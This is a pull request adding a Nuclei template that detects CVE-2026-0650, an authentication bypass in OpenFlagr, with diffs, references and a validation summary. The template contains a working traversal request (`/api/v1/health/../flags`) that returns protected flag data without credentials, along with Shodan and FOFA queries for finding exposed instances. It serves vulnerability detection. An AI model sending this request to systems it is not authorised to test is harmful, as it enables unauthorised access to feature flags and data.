### PR TITLE
Add CVE-2026-0650 template

### DIFF
--- a/http/cves/2026/CVE-2026-0650.yaml
+++ b/http/cves/2026/CVE-2026-0650.yaml
@@ -1,16 +1,15 @@
 id: CVE-2026-0650
 
 info:
-  name: OpenFlagr - Authentication Bypass via Path Prefix Confusion
+  name: OpenFlagr <= 1.1.18 - Authentication Bypass
   author: str4k3r
   severity: critical
   description: |
-    OpenFlagr's authentication middleware compares raw request paths with
-    whitelisted prefixes before router normalization. A path beginning with
-    `/api/v1/health/` followed by a traversal segment is therefore accepted as
-    public while the router serves the protected `/api/v1/flags` handler. The
-    fixed release normalizes the path and rejects traversal before comparison.
-  remediation: Upgrade OpenFlagr to the release containing commit fe83dc8 or later.
+    OpenFlagr <= 1.1.18 contains an authentication bypass caused by improper path normalization handling in HTTP middleware whitelist logic, letting attackers access protected API endpoints without valid credentials, exploit requires crafted requests.
+  impact: |
+    Attackers can bypass authentication to modify feature flags and export sensitive data, compromising system integrity and confidentiality.
+  remediation: |
+    Update to the latest version beyond 1.1.18.
   reference:
     - https://github.com/advisories/GHSA-rwp9-5g7q-73q3
     - https://github.com/openflagr/flagr/commit/fe83dc87aa404a57554aa5839ac450f55c203570
@@ -26,20 +25,19 @@ info:
     product: flagr
     verified: true
     max-request: 1
+    shodan-query: http.html:"Flagr"
+    fofa-query: body="Flagr"
   tags: cve,cve2026,openflagr,authbypass,unauth,traversal
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/health/../flags"
-    matchers-condition: and
+  - raw:
+      - |
+        GET /api/v1/health/../flags HTTP/1.1
+        Host: {{Hostname}}
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - '"dataRecordsEnabled"'
-          - '"variants"'
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "\"dataRecordsEnabled\"", "\"variants\"", "\"key\"")'
         condition: and

--- a/http/cves/2026/CVE-2026-0650.yaml
+++ b/http/cves/2026/CVE-2026-0650.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-0650
+
+info:
+  name: OpenFlagr - Authentication Bypass via Path Prefix Confusion
+  author: str4k3r
+  severity: critical
+  description: |
+    OpenFlagr's authentication middleware compares raw request paths with
+    whitelisted prefixes before router normalization. A path beginning with
+    `/api/v1/health/` followed by a traversal segment is therefore accepted as
+    public while the router serves the protected `/api/v1/flags` handler. The
+    fixed release normalizes the path and rejects traversal before comparison.
+  remediation: Upgrade OpenFlagr to the release containing commit fe83dc8 or later.
+  reference:
+    - https://github.com/advisories/GHSA-rwp9-5g7q-73q3
+    - https://github.com/openflagr/flagr/commit/fe83dc87aa404a57554aa5839ac450f55c203570
+    - https://dreyand.rs/code%20review/golang/2026/01/03/0day-speedrun-openflagr-less-1118-authentication-bypass
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0650
+  classification:
+    cve-id: CVE-2026-0650
+    cwe-id: CWE-22
+    cvss-score: 9.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+  metadata:
+    vendor: openflagr
+    product: flagr
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,openflagr,authbypass,unauth,traversal
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/health/../flags"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"dataRecordsEnabled"'
+          - '"variants"'
+        condition: and


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-0650 in OpenFlagr. A raw-prefix check in the authentication middleware allows a traversal-shaped path to reach the protected flags handler; the fixed code normalizes and rejects the path before authorization.

## Detection

The template sends the generic `/api/v1/health/../flags` request and matches the characteristic flags response. It is a single unauthenticated GET with no state-changing operation.

## References

- https://github.com/advisories/GHSA-rwp9-5g7q-73q3
- https://github.com/openflagr/flagr/commit/fe83dc87aa404a57554aa5839ac450f55c203570
- https://nvd.nist.gov/vuln/detail/CVE-2026-0650

## Validation

Previously recorded native Nuclei v3.11.0 differential: vulnerable 1.1.18 detected 3/3; fixed 1.1.19 not detected 3/3. The final template was syntax-validated and quality-checked before submission.